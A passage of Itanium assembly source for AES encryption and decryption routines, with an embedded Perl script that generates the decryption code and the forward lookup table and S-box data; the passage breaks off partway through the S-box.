ld1 out7=[out4] };; // s3
{ .mii;
dep out1=r16,out1,24,8 //;;
dep out3=r20,out3,24,8 }//;;
{ .mii; ADDP rk0=0,in2
dep out5=r24,out5,24,8 //;;
dep out7=r28,out7,24,8 };;
{ .mii; ADDP rk1=KSZ,in2
dep out1=r17,out1,16,8 //;;
dep out3=r21,out3,16,8 }//;;
{ .mii; mov twenty4=24
dep out5=r25,out5,16,8 //;;
dep out7=r29,out7,16,8 };;
{ .mii; mov sixteen=16
dep out1=r18,out1,8,8 //;;
dep out3=r22,out3,8,8 }//;;
{ .mii; mov maskff=0xff
dep out5=r26,out5,8,8 //;;
dep out7=r30,out7,8,8 };;
{ .mib; br.call.sptk.many b6=_ia64_AES_encrypt };;
.Le_o_unaligned:
{ .mii; ADDP out0=0,in1
extr.u r17=r16,8,8 // s0
shr.u r19=r16,twenty4 }//;;
{ .mii; ADDP out1=1,in1
extr.u r18=r16,16,8
shr.u r23=r20,twenty4 }//;; // s1
{ .mii; ADDP out2=2,in1
extr.u r21=r20,8,8
shr.u r22=r20,sixteen }//;;
{ .mii; ADDP out3=3,in1
extr.u r25=r24,8,8 // s2
shr.u r27=r24,twenty4 };;
{ .mii; st1 [out3]=r16,4
extr.u r26=r24,16,8
shr.u r31=r28,twenty4 }//;; // s3
{ .mii; st1 [out2]=r17,4
extr.u r29=r28,8,8
shr.u r30=r28,sixteen }//;;
{ .mmi; st1 [out1]=r18,4
st1 [out0]=r19,4 };;
{ .mmi; st1 [out3]=r20,4
st1 [out2]=r21,4 }//;;
{ .mmi; st1 [out1]=r22,4
st1 [out0]=r23,4 };;
{ .mmi; st1 [out3]=r24,4
st1 [out2]=r25,4
mov pr=prsave,0x1ffff }//;;
{ .mmi; st1 [out1]=r26,4
st1 [out0]=r27,4
mov ar.pfs=pfssave };;
{ .mmi; st1 [out3]=r28
st1 [out2]=r29
mov ar.lc=lcsave }//;;
{ .mmi; st1 [out1]=r30
st1 [out0]=r31 }
{ .mfb; mov psr.um=loc0 // restore user mask
br.ret.sptk.many b0 };;
.endp AES_encrypt#
// *AES_decrypt are autogenerated by the following script:
#if 0
#!/usr/bin/env perl
print "// *AES_decrypt are autogenerated by the following script:\n#if 0\n";
open(PROG,'<'.$0); while(<PROG>) { print; } close(PROG);
print "#endif\n";
while(<>) {
$process=1 if (/\.proc\s+_ia64_AES_encrypt/);
next if (!$process);
#s/te00=s0/td00=s0/; s/te00/td00/g;
s/te11=s1/td13=s3/; s/te11/td13/g;
#s/te22=s2/td22=s2/; s/te22/td22/g;
s/te33=s3/td31=s1/; s/te33/td31/g;
#s/te01=s1/td01=s1/; s/te01/td01/g;
s/te12=s2/td10=s0/; s/te12/td10/g;
#s/te23=s3/td23=s3/; s/te23/td23/g;
s/te30=s0/td32=s2/; s/te30/td32/g;
#s/te02=s2/td02=s2/; s/te02/td02/g;
s/te13=s3/td11=s1/; s/te13/td11/g;
#s/te20=s0/td20=s0/; s/te20/td20/g;
s/te31=s1/td33=s3/; s/te31/td33/g;
#s/te03=s3/td03=s3/; s/te03/td03/g;
s/te10=s0/td12=s2/; s/te10/td12/g;
#s/te21=s1/td21=s1/; s/te21/td21/g;
s/te32=s2/td30=s0/; s/te32/td30/g;
s/td/te/g;
s/AES_encrypt/AES_decrypt/g;
s/\.Le_/.Ld_/g;
s/AES_Te#/AES_Td#/g;
print;
exit if (/\.endp\s+AES_decrypt/);
}
#endif
.proc _ia64_AES_decrypt#
// Input: rk0-rk1
// te0
// te3 as AES_KEY->rounds!!!
// s0-s3
// maskff,twenty4,sixteen
// Output: r16,r20,r24,r28 as s0-s3
// Clobber: r16-r31,rk0-rk1,r32-r43
.align 32
_ia64_AES_decrypt:
.prologue
.altrp b6
.body
{ .mmi; alloc r16=ar.pfs,12,0,0,8
LDKEY t0=[rk0],2*KSZ
mov pr.rot=1<<16 }
{ .mmi; LDKEY t1=[rk1],2*KSZ
add te1=TE1,te0
add te3=-3,te3 };;
{ .mib; LDKEY t2=[rk0],2*KSZ
mov ar.ec=2 }
{ .mib; LDKEY t3=[rk1],2*KSZ
add te2=TE2,te0
brp.loop.imp .Ld_top,.Ld_end-16 };;
{ .mmi; xor s0=s0,t0
xor s1=s1,t1
mov ar.lc=te3 }
{ .mmi; xor s2=s2,t2
xor s3=s3,t3
add te3=TE3,te0 };;
.align 32
.Ld_top:
{ .mmi; (p0) LDKEY t0=[rk0],2*KSZ // 0/0:rk[0]
(p0) and te31=s1,maskff // 0/0:s3&0xff
(p0) extr.u te22=s2,8,8 } // 0/0:s2>>8&0xff
{ .mmi; (p0) LDKEY t1=[rk1],2*KSZ // 0/1:rk[1]
(p0) and te32=s2,maskff // 0/1:s0&0xff
(p0) shr.u te00=s0,twenty4 };; // 0/0:s0>>24
{ .mmi; (p0) LDKEY t2=[rk0],2*KSZ // 1/2:rk[2]
(p0) shladd te31=te31,3,te3 // 1/0:te0+s0>>24
(p0) extr.u te23=s3,8,8 } // 1/1:s3>>8&0xff
{ .mmi; (p0) LDKEY t3=[rk1],2*KSZ // 1/3:rk[3]
(p0) shladd te32=te32,3,te3 // 1/1:te3+s0
(p0) shr.u te01=s1,twenty4 };; // 1/1:s1>>24
{ .mmi; (p0) ld4 te31=[te31] // 2/0:te3[s3&0xff]
(p0) shladd te22=te22,3,te2 // 2/0:te2+s2>>8&0xff
(p0) extr.u te20=s0,8,8 } // 2/2:s0>>8&0xff
{ .mmi; (p0) ld4 te32=[te32] // 2/1:te3[s0]
(p0) shladd te23=te23,3,te2 // 2/1:te2+s3>>8
(p0) shr.u te02=s2,twenty4 };; // 2/2:s2>>24
{ .mmi; (p0) ld4 te22=[te22] // 3/0:te2[s2>>8]
(p0) shladd te20=te20,3,te2 // 3/2:te2+s0>>8
(p0) extr.u te21=s1,8,8 } // 3/3:s1>>8&0xff
{ .mmi; (p0) ld4 te23=[te23] // 3/1:te2[s3>>8]
(p0) shladd te00=te00,3,te0 // 3/0:te0+s0>>24
(p0) shr.u te03=s3,twenty4 };; // 3/3:s3>>24
{ .mmi; (p0) ld4 te20=[te20] // 4/2:te2[s0>>8]
(p0) shladd te21=te21,3,te2 // 4/3:te3+s2
(p0) extr.u te13=s3,16,8 } // 4/0:s1>>16&0xff
{ .mmi; (p0) ld4 te00=[te00] // 4/0:te0[s0>>24]
(p0) shladd te01=te01,3,te0 // 4/1:te0+s1>>24
(p0) shr.u te11=s1,sixteen };; // 4/2:s3>>16
{ .mmi; (p0) ld4 te21=[te21] // 5/3:te2[s1>>8]
(p0) shladd te13=te13,3,te1 // 5/0:te1+s1>>16
(p0) extr.u te10=s0,16,8 } // 5/1:s2>>16&0xff
{ .mmi; (p0) ld4 te01=[te01] // 5/1:te0[s1>>24]
(p0) shladd te02=te02,3,te0 // 5/2:te0+s2>>24
(p0) and te33=s3,maskff };; // 5/2:s1&0xff
{ .mmi; (p0) ld4 te13=[te13] // 6/0:te1[s1>>16]
(p0) shladd te10=te10,3,te1 // 6/1:te1+s2>>16
(p0) extr.u te12=s2,16,8 } // 6/3:s0>>16&0xff
{ .mmi; (p0) ld4 te02=[te02] // 6/2:te0[s2>>24]
(p0) shladd te03=te03,3,te0 // 6/3:te1+s0>>16
(p0) and te30=s0,maskff };; // 6/3:s2&0xff
{ .mmi; (p0) ld4 te10=[te10] // 7/1:te1[s2>>16]
(p0) shladd te33=te33,3,te3 // 7/2:te3+s1&0xff
(p0) and te11=te11,maskff} // 7/2:s3>>16&0xff
{ .mmi; (p0) ld4 te03=[te03] // 7/3:te0[s3>>24]
(p0) shladd te30=te30,3,te3 // 7/3:te3+s2
(p0) xor t0=t0,te31 };; // 7/0:
{ .mmi; (p0) ld4 te33=[te33] // 8/2:te3[s1]
(p0) shladd te11=te11,3,te1 // 8/2:te1+s3>>16
(p0) xor t0=t0,te22 } // 8/0:
{ .mmi; (p0) ld4 te30=[te30] // 8/3:te3[s2]
(p0) shladd te12=te12,3,te1 // 8/3:te1+s0>>16
(p0) xor t1=t1,te32 };; // 8/1:
{ .mmi; (p0) ld4 te11=[te11] // 9/2:te1[s3>>16]
(p0) ld4 te12=[te12] // 9/3:te1[s0>>16]
(p0) xor t0=t0,te00 };; // 9/0: !L2 scheduling
{ .mmi; (p0) xor t1=t1,te23 // 10[9]/1:
(p0) xor t2=t2,te20 // 10[9]/2:
(p0) xor t3=t3,te21 };; // 10[9]/3:
{ .mmi; (p0) xor t0=t0,te13 // 11[10]/0:done!
(p0) xor t1=t1,te01 // 11[10]/1:
(p0) xor t2=t2,te02 };; // 11[10]/2: !L2 scheduling
{ .mmi; (p0) xor t3=t3,te03 // 12[10]/3:
(p16) cmp.eq p0,p17=r0,r0 };; // 12[10]/clear (p17)
{ .mmi; (p0) xor t1=t1,te10 // 13[11]/1:done!
(p0) xor t2=t2,te33 // 13[11]/2:
(p0) xor t3=t3,te30 } // 13[11]/3:
{ .mmi; (p17) add te0=2048,te0 // 13[11]/
(p17) add te1=2048+64-TE1,te1};; // 13[11]/
{ .mib; (p0) xor t2=t2,te11 // 14[12]/2:done!
(p17) add te2=2048+128-TE2,te2} // 14[12]/
{ .mib; (p0) xor t3=t3,te12 // 14[12]/3:done!
(p17) add te3=2048+192-TE3,te3 // 14[12]/
br.ctop.sptk .Ld_top };;
.Ld_end:
{ .mmi; ld8 te10=[te0] // prefetch Td4
ld8 te33=[te1] }
{ .mmi; ld8 te12=[te2]
ld8 te30=[te3] }
{ .mmi; LDKEY t0=[rk0],2*KSZ // 0/0:rk[0]
and te31=s1,maskff // 0/0:s3&0xff
extr.u te22=s2,8,8 } // 0/0:s2>>8&0xff
{ .mmi; LDKEY t1=[rk1],2*KSZ // 0/1:rk[1]
and te32=s2,maskff // 0/1:s0&0xff
shr.u te00=s0,twenty4 };; // 0/0:s0>>24
{ .mmi; LDKEY t2=[rk0],2*KSZ // 1/2:rk[2]
add te31=te31,te0 // 1/0:te0+s0>>24
extr.u te23=s3,8,8 } // 1/1:s3>>8&0xff
{ .mmi; LDKEY t3=[rk1],2*KSZ // 1/3:rk[3]
add te32=te32,te0 // 1/1:te0+s0
shr.u te01=s1,twenty4 };; // 1/1:s1>>24
{ .mmi; ld1 te31=[te31] // 2/0:te0[s3&0xff]
add te22=te22,te0 // 2/0:te0+s2>>8&0xff
extr.u te20=s0,8,8 } // 2/2:s0>>8&0xff
{ .mmi; ld1 te32=[te32] // 2/1:te0[s0]
add te23=te23,te0 // 2/1:te0+s3>>8
shr.u te02=s2,twenty4 };; // 2/2:s2>>24
{ .mmi; ld1 te22=[te22] // 3/0:te0[s2>>8]
add te20=te20,te0 // 3/2:te0+s0>>8
extr.u te21=s1,8,8 } // 3/3:s1>>8&0xff
{ .mmi; ld1 te23=[te23] // 3/1:te0[s3>>8]
add te00=te00,te0 // 3/0:te0+s0>>24
shr.u te03=s3,twenty4 };; // 3/3:s3>>24
{ .mmi; ld1 te20=[te20] // 4/2:te0[s0>>8]
add te21=te21,te0 // 4/3:te0+s2
extr.u te13=s3,16,8 } // 4/0:s1>>16&0xff
{ .mmi; ld1 te00=[te00] // 4/0:te0[s0>>24]
add te01=te01,te0 // 4/1:te0+s1>>24
shr.u te11=s1,sixteen };; // 4/2:s3>>16
{ .mmi; ld1 te21=[te21] // 5/3:te0[s1>>8]
add te13=te13,te0 // 5/0:te0+s1>>16
extr.u te10=s0,16,8 } // 5/1:s2>>16&0xff
{ .mmi; ld1 te01=[te01] // 5/1:te0[s1>>24]
add te02=te02,te0 // 5/2:te0+s2>>24
and te33=s3,maskff };; // 5/2:s1&0xff
{ .mmi; ld1 te13=[te13] // 6/0:te0[s1>>16]
add te10=te10,te0 // 6/1:te0+s2>>16
extr.u te12=s2,16,8 } // 6/3:s0>>16&0xff
{ .mmi; ld1 te02=[te02] // 6/2:te0[s2>>24]
add te03=te03,te0 // 6/3:te0+s0>>16
and te30=s0,maskff };; // 6/3:s2&0xff
{ .mmi; ld1 te10=[te10] // 7/1:te0[s2>>16]
add te33=te33,te0 // 7/2:te0+s1&0xff
dep te31=te22,te31,8,8} // 7/0:
{ .mmi; ld1 te03=[te03] // 7/3:te0[s3>>24]
add te30=te30,te0 // 7/3:te0+s2
and te11=te11,maskff};; // 7/2:s3>>16&0xff
{ .mmi; ld1 te33=[te33] // 8/2:te0[s1]
add te11=te11,te0 // 8/2:te0+s3>>16
dep te32=te23,te32,8,8} // 8/1:
{ .mmi; ld1 te30=[te30] // 8/3:te0[s2]
add te12=te12,te0 // 8/3:te0+s0>>16
shl te00=te00,twenty4};; // 8/0:
{ .mii; ld1 te11=[te11] // 9/2:te0[s3>>16]
dep te31=te13,te31,16,8 // 9/0:
shl te01=te01,twenty4};; // 9/1:
{ .mii; ld1 te12=[te12] // 10/3:te0[s0>>16]
dep te33=te20,te33,8,8 // 10/2:
shl te02=te02,twenty4};; // 10/2:
{ .mii; xor t0=t0,te31 // 11/0:
dep te30=te21,te30,8,8 // 11/3:
shl te10=te10,sixteen};; // 11/1:
{ .mii; xor r16=t0,te00 // 12/0:done!
dep te33=te11,te33,16,8 // 12/2:
shl te03=te03,twenty4};; // 12/3:
{ .mmi; xor t1=t1,te01 // 13/1:
xor t2=t2,te02 // 13/2:
dep te30=te12,te30,16,8};; // 13/3:
{ .mmi; xor t1=t1,te32 // 14/1:
xor r24=t2,te33 // 14/2:done!
xor t3=t3,te30 };; // 14/3:
{ .mib; xor r20=t1,te10 // 15/1:done!
xor r28=t3,te03 // 15/3:done!
br.ret.sptk b6 };;
.endp _ia64_AES_decrypt#
// void AES_decrypt (const void *in,void *out,const AES_KEY *key);
.global AES_decrypt#
.proc AES_decrypt#
.align 32
AES_decrypt:
.prologue
.save ar.pfs,pfssave
{ .mmi; alloc pfssave=ar.pfs,3,1,12,0
and out0=3,in0
mov r3=ip }
{ .mmi; ADDP in0=0,in0
mov loc0=psr.um
ADDP out11=KSZ*60,in2 };; // &AES_KEY->rounds
{ .mmi; ld4 out11=[out11] // AES_KEY->rounds
add out8=(AES_Td#-AES_decrypt#),r3 // Te0
.save pr,prsave
mov prsave=pr }
{ .mmi; rum 1<<3 // clear um.ac
.save ar.lc,lcsave
mov lcsave=ar.lc };;
.body
#if defined(_HPUX_SOURCE) // HPUX is big-endian, cut 15+15 cycles...
{ .mib; cmp.ne p6,p0=out0,r0
add out0=4,in0
(p6) br.dpnt.many .Ld_i_unaligned };;
{ .mmi; ld4 out1=[in0],8 // s0
and out9=3,in1
mov twenty4=24 }
{ .mmi; ld4 out3=[out0],8 // s1
ADDP rk0=0,in2
mov sixteen=16 };;
{ .mmi; ld4 out5=[in0] // s2
cmp.ne p6,p0=out9,r0
mov maskff=0xff }
{ .mmb; ld4 out7=[out0] // s3
ADDP rk1=KSZ,in2
br.call.sptk.many b6=_ia64_AES_decrypt };;
{ .mib; ADDP in0=4,in1
ADDP in1=0,in1
(p6) br.spnt .Ld_o_unaligned };;
{ .mii; mov psr.um=loc0
mov ar.pfs=pfssave
mov ar.lc=lcsave };;
{ .mmi; st4 [in1]=r16,8 // s0
st4 [in0]=r20,8 // s1
mov pr=prsave,0x1ffff };;
{ .mmb; st4 [in1]=r24 // s2
st4 [in0]=r28 // s3
br.ret.sptk.many b0 };;
#endif
.align 32
.Ld_i_unaligned:
{ .mmi; add out0=1,in0
add out2=2,in0
add out4=3,in0 };;
{ .mmi; ld1 r16=[in0],4
ld1 r17=[out0],4 }//;;
{ .mmi; ld1 r18=[out2],4
ld1 out1=[out4],4 };; // s0
{ .mmi; ld1 r20=[in0],4
ld1 r21=[out0],4 }//;;
{ .mmi; ld1 r22=[out2],4
ld1 out3=[out4],4 };; // s1
{ .mmi; ld1 r24=[in0],4
ld1 r25=[out0],4 }//;;
{ .mmi; ld1 r26=[out2],4
ld1 out5=[out4],4 };; // s2
{ .mmi; ld1 r28=[in0]
ld1 r29=[out0] }//;;
{ .mmi; ld1 r30=[out2]
ld1 out7=[out4] };; // s3
{ .mii;
dep out1=r16,out1,24,8 //;;
dep out3=r20,out3,24,8 }//;;
{ .mii; ADDP rk0=0,in2
dep out5=r24,out5,24,8 //;;
dep out7=r28,out7,24,8 };;
{ .mii; ADDP rk1=KSZ,in2
dep out1=r17,out1,16,8 //;;
dep out3=r21,out3,16,8 }//;;
{ .mii; mov twenty4=24
dep out5=r25,out5,16,8 //;;
dep out7=r29,out7,16,8 };;
{ .mii; mov sixteen=16
dep out1=r18,out1,8,8 //;;
dep out3=r22,out3,8,8 }//;;
{ .mii; mov maskff=0xff
dep out5=r26,out5,8,8 //;;
dep out7=r30,out7,8,8 };;
{ .mib; br.call.sptk.many b6=_ia64_AES_decrypt };;
.Ld_o_unaligned:
{ .mii; ADDP out0=0,in1
extr.u r17=r16,8,8 // s0
shr.u r19=r16,twenty4 }//;;
{ .mii; ADDP out1=1,in1
extr.u r18=r16,16,8
shr.u r23=r20,twenty4 }//;; // s1
{ .mii; ADDP out2=2,in1
extr.u r21=r20,8,8
shr.u r22=r20,sixteen }//;;
{ .mii; ADDP out3=3,in1
extr.u r25=r24,8,8 // s2
shr.u r27=r24,twenty4 };;
{ .mii; st1 [out3]=r16,4
extr.u r26=r24,16,8
shr.u r31=r28,twenty4 }//;; // s3
{ .mii; st1 [out2]=r17,4
extr.u r29=r28,8,8
shr.u r30=r28,sixteen }//;;
{ .mmi; st1 [out1]=r18,4
st1 [out0]=r19,4 };;
{ .mmi; st1 [out3]=r20,4
st1 [out2]=r21,4 }//;;
{ .mmi; st1 [out1]=r22,4
st1 [out0]=r23,4 };;
{ .mmi; st1 [out3]=r24,4
st1 [out2]=r25,4
mov pr=prsave,0x1ffff }//;;
{ .mmi; st1 [out1]=r26,4
st1 [out0]=r27,4
mov ar.pfs=pfssave };;
{ .mmi; st1 [out3]=r28
st1 [out2]=r29
mov ar.lc=lcsave }//;;
{ .mmi; st1 [out1]=r30
st1 [out0]=r31 }
{ .mfb; mov psr.um=loc0 // restore user mask
br.ret.sptk.many b0 };;
.endp AES_decrypt#
// leave it in .text segment...
.align 64
.global AES_Te#
.type AES_Te#,@object
// AES forward (encryption) lookup tables, kept in .text so they are
// reachable PC-relative.  Te holds 256 32-bit entries, each entry
// emitted twice in consecutive words -- presumably so byte-rotated
// lanes can be fetched at a fixed extra offset; TODO confirm against
// the _ia64_AES_encrypt table-lookup code (outside this view).
// The values are the standard FIPS-197 Te table; the trailing Te4
// block is the raw 256-byte S-box.
AES_Te: data4 0xc66363a5,0xc66363a5, 0xf87c7c84,0xf87c7c84
data4 0xee777799,0xee777799, 0xf67b7b8d,0xf67b7b8d
data4 0xfff2f20d,0xfff2f20d, 0xd66b6bbd,0xd66b6bbd
data4 0xde6f6fb1,0xde6f6fb1, 0x91c5c554,0x91c5c554
data4 0x60303050,0x60303050, 0x02010103,0x02010103
data4 0xce6767a9,0xce6767a9, 0x562b2b7d,0x562b2b7d
data4 0xe7fefe19,0xe7fefe19, 0xb5d7d762,0xb5d7d762
data4 0x4dababe6,0x4dababe6, 0xec76769a,0xec76769a
data4 0x8fcaca45,0x8fcaca45, 0x1f82829d,0x1f82829d
data4 0x89c9c940,0x89c9c940, 0xfa7d7d87,0xfa7d7d87
data4 0xeffafa15,0xeffafa15, 0xb25959eb,0xb25959eb
data4 0x8e4747c9,0x8e4747c9, 0xfbf0f00b,0xfbf0f00b
data4 0x41adadec,0x41adadec, 0xb3d4d467,0xb3d4d467
data4 0x5fa2a2fd,0x5fa2a2fd, 0x45afafea,0x45afafea
data4 0x239c9cbf,0x239c9cbf, 0x53a4a4f7,0x53a4a4f7
data4 0xe4727296,0xe4727296, 0x9bc0c05b,0x9bc0c05b
data4 0x75b7b7c2,0x75b7b7c2, 0xe1fdfd1c,0xe1fdfd1c
data4 0x3d9393ae,0x3d9393ae, 0x4c26266a,0x4c26266a
data4 0x6c36365a,0x6c36365a, 0x7e3f3f41,0x7e3f3f41
data4 0xf5f7f702,0xf5f7f702, 0x83cccc4f,0x83cccc4f
data4 0x6834345c,0x6834345c, 0x51a5a5f4,0x51a5a5f4
data4 0xd1e5e534,0xd1e5e534, 0xf9f1f108,0xf9f1f108
data4 0xe2717193,0xe2717193, 0xabd8d873,0xabd8d873
data4 0x62313153,0x62313153, 0x2a15153f,0x2a15153f
data4 0x0804040c,0x0804040c, 0x95c7c752,0x95c7c752
data4 0x46232365,0x46232365, 0x9dc3c35e,0x9dc3c35e
data4 0x30181828,0x30181828, 0x379696a1,0x379696a1
data4 0x0a05050f,0x0a05050f, 0x2f9a9ab5,0x2f9a9ab5
data4 0x0e070709,0x0e070709, 0x24121236,0x24121236
data4 0x1b80809b,0x1b80809b, 0xdfe2e23d,0xdfe2e23d
data4 0xcdebeb26,0xcdebeb26, 0x4e272769,0x4e272769
data4 0x7fb2b2cd,0x7fb2b2cd, 0xea75759f,0xea75759f
data4 0x1209091b,0x1209091b, 0x1d83839e,0x1d83839e
data4 0x582c2c74,0x582c2c74, 0x341a1a2e,0x341a1a2e
data4 0x361b1b2d,0x361b1b2d, 0xdc6e6eb2,0xdc6e6eb2
data4 0xb45a5aee,0xb45a5aee, 0x5ba0a0fb,0x5ba0a0fb
data4 0xa45252f6,0xa45252f6, 0x763b3b4d,0x763b3b4d
data4 0xb7d6d661,0xb7d6d661, 0x7db3b3ce,0x7db3b3ce
data4 0x5229297b,0x5229297b, 0xdde3e33e,0xdde3e33e
data4 0x5e2f2f71,0x5e2f2f71, 0x13848497,0x13848497
data4 0xa65353f5,0xa65353f5, 0xb9d1d168,0xb9d1d168
data4 0x00000000,0x00000000, 0xc1eded2c,0xc1eded2c
data4 0x40202060,0x40202060, 0xe3fcfc1f,0xe3fcfc1f
data4 0x79b1b1c8,0x79b1b1c8, 0xb65b5bed,0xb65b5bed
data4 0xd46a6abe,0xd46a6abe, 0x8dcbcb46,0x8dcbcb46
data4 0x67bebed9,0x67bebed9, 0x7239394b,0x7239394b
data4 0x944a4ade,0x944a4ade, 0x984c4cd4,0x984c4cd4
data4 0xb05858e8,0xb05858e8, 0x85cfcf4a,0x85cfcf4a
data4 0xbbd0d06b,0xbbd0d06b, 0xc5efef2a,0xc5efef2a
data4 0x4faaaae5,0x4faaaae5, 0xedfbfb16,0xedfbfb16
data4 0x864343c5,0x864343c5, 0x9a4d4dd7,0x9a4d4dd7
data4 0x66333355,0x66333355, 0x11858594,0x11858594
data4 0x8a4545cf,0x8a4545cf, 0xe9f9f910,0xe9f9f910
data4 0x04020206,0x04020206, 0xfe7f7f81,0xfe7f7f81
data4 0xa05050f0,0xa05050f0, 0x783c3c44,0x783c3c44
data4 0x259f9fba,0x259f9fba, 0x4ba8a8e3,0x4ba8a8e3
data4 0xa25151f3,0xa25151f3, 0x5da3a3fe,0x5da3a3fe
data4 0x804040c0,0x804040c0, 0x058f8f8a,0x058f8f8a
data4 0x3f9292ad,0x3f9292ad, 0x219d9dbc,0x219d9dbc
data4 0x70383848,0x70383848, 0xf1f5f504,0xf1f5f504
data4 0x63bcbcdf,0x63bcbcdf, 0x77b6b6c1,0x77b6b6c1
data4 0xafdada75,0xafdada75, 0x42212163,0x42212163
data4 0x20101030,0x20101030, 0xe5ffff1a,0xe5ffff1a
data4 0xfdf3f30e,0xfdf3f30e, 0xbfd2d26d,0xbfd2d26d
data4 0x81cdcd4c,0x81cdcd4c, 0x180c0c14,0x180c0c14
data4 0x26131335,0x26131335, 0xc3ecec2f,0xc3ecec2f
data4 0xbe5f5fe1,0xbe5f5fe1, 0x359797a2,0x359797a2
data4 0x884444cc,0x884444cc, 0x2e171739,0x2e171739
data4 0x93c4c457,0x93c4c457, 0x55a7a7f2,0x55a7a7f2
data4 0xfc7e7e82,0xfc7e7e82, 0x7a3d3d47,0x7a3d3d47
data4 0xc86464ac,0xc86464ac, 0xba5d5de7,0xba5d5de7
data4 0x3219192b,0x3219192b, 0xe6737395,0xe6737395
data4 0xc06060a0,0xc06060a0, 0x19818198,0x19818198
data4 0x9e4f4fd1,0x9e4f4fd1, 0xa3dcdc7f,0xa3dcdc7f
data4 0x44222266,0x44222266, 0x542a2a7e,0x542a2a7e
data4 0x3b9090ab,0x3b9090ab, 0x0b888883,0x0b888883
data4 0x8c4646ca,0x8c4646ca, 0xc7eeee29,0xc7eeee29
data4 0x6bb8b8d3,0x6bb8b8d3, 0x2814143c,0x2814143c
data4 0xa7dede79,0xa7dede79, 0xbc5e5ee2,0xbc5e5ee2
data4 0x160b0b1d,0x160b0b1d, 0xaddbdb76,0xaddbdb76
data4 0xdbe0e03b,0xdbe0e03b, 0x64323256,0x64323256
data4 0x743a3a4e,0x743a3a4e, 0x140a0a1e,0x140a0a1e
data4 0x924949db,0x924949db, 0x0c06060a,0x0c06060a
data4 0x4824246c,0x4824246c, 0xb85c5ce4,0xb85c5ce4
data4 0x9fc2c25d,0x9fc2c25d, 0xbdd3d36e,0xbdd3d36e
data4 0x43acacef,0x43acacef, 0xc46262a6,0xc46262a6
data4 0x399191a8,0x399191a8, 0x319595a4,0x319595a4
data4 0xd3e4e437,0xd3e4e437, 0xf279798b,0xf279798b
data4 0xd5e7e732,0xd5e7e732, 0x8bc8c843,0x8bc8c843
data4 0x6e373759,0x6e373759, 0xda6d6db7,0xda6d6db7
data4 0x018d8d8c,0x018d8d8c, 0xb1d5d564,0xb1d5d564
data4 0x9c4e4ed2,0x9c4e4ed2, 0x49a9a9e0,0x49a9a9e0
data4 0xd86c6cb4,0xd86c6cb4, 0xac5656fa,0xac5656fa
data4 0xf3f4f407,0xf3f4f407, 0xcfeaea25,0xcfeaea25
data4 0xca6565af,0xca6565af, 0xf47a7a8e,0xf47a7a8e
data4 0x47aeaee9,0x47aeaee9, 0x10080818,0x10080818
data4 0x6fbabad5,0x6fbabad5, 0xf0787888,0xf0787888
data4 0x4a25256f,0x4a25256f, 0x5c2e2e72,0x5c2e2e72
data4 0x381c1c24,0x381c1c24, 0x57a6a6f1,0x57a6a6f1
data4 0x73b4b4c7,0x73b4b4c7, 0x97c6c651,0x97c6c651
data4 0xcbe8e823,0xcbe8e823, 0xa1dddd7c,0xa1dddd7c
data4 0xe874749c,0xe874749c, 0x3e1f1f21,0x3e1f1f21
data4 0x964b4bdd,0x964b4bdd, 0x61bdbddc,0x61bdbddc
data4 0x0d8b8b86,0x0d8b8b86, 0x0f8a8a85,0x0f8a8a85
data4 0xe0707090,0xe0707090, 0x7c3e3e42,0x7c3e3e42
data4 0x71b5b5c4,0x71b5b5c4, 0xcc6666aa,0xcc6666aa
data4 0x904848d8,0x904848d8, 0x06030305,0x06030305
data4 0xf7f6f601,0xf7f6f601, 0x1c0e0e12,0x1c0e0e12
data4 0xc26161a3,0xc26161a3, 0x6a35355f,0x6a35355f
data4 0xae5757f9,0xae5757f9, 0x69b9b9d0,0x69b9b9d0
data4 0x17868691,0x17868691, 0x99c1c158,0x99c1c158
data4 0x3a1d1d27,0x3a1d1d27, 0x279e9eb9,0x279e9eb9
data4 0xd9e1e138,0xd9e1e138, 0xebf8f813,0xebf8f813
data4 0x2b9898b3,0x2b9898b3, 0x22111133,0x22111133
data4 0xd26969bb,0xd26969bb, 0xa9d9d970,0xa9d9d970
data4 0x078e8e89,0x078e8e89, 0x339494a7,0x339494a7
data4 0x2d9b9bb6,0x2d9b9bb6, 0x3c1e1e22,0x3c1e1e22
data4 0x15878792,0x15878792, 0xc9e9e920,0xc9e9e920
data4 0x87cece49,0x87cece49, 0xaa5555ff,0xaa5555ff
data4 0x50282878,0x50282878, 0xa5dfdf7a,0xa5dfdf7a
data4 0x038c8c8f,0x038c8c8f, 0x59a1a1f8,0x59a1a1f8
data4 0x09898980,0x09898980, 0x1a0d0d17,0x1a0d0d17
data4 0x65bfbfda,0x65bfbfda, 0xd7e6e631,0xd7e6e631
data4 0x844242c6,0x844242c6, 0xd06868b8,0xd06868b8
data4 0x824141c3,0x824141c3, 0x299999b0,0x299999b0
data4 0x5a2d2d77,0x5a2d2d77, 0x1e0f0f11,0x1e0f0f11
data4 0x7bb0b0cb,0x7bb0b0cb, 0xa85454fc,0xa85454fc
data4 0x6dbbbbd6,0x6dbbbbd6, 0x2c16163a,0x2c16163a
// Te4: the plain AES S-box (SubBytes), 256 bytes, used for the last round.
data1 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5
data1 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76
data1 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0
data1 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0
data1 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc
data1 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15
data1 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a
data1 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75
data1 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0
data1 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84
data1 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b
data1 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf
data1 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85
data1 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8
data1 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5
data1 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2
data1 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17
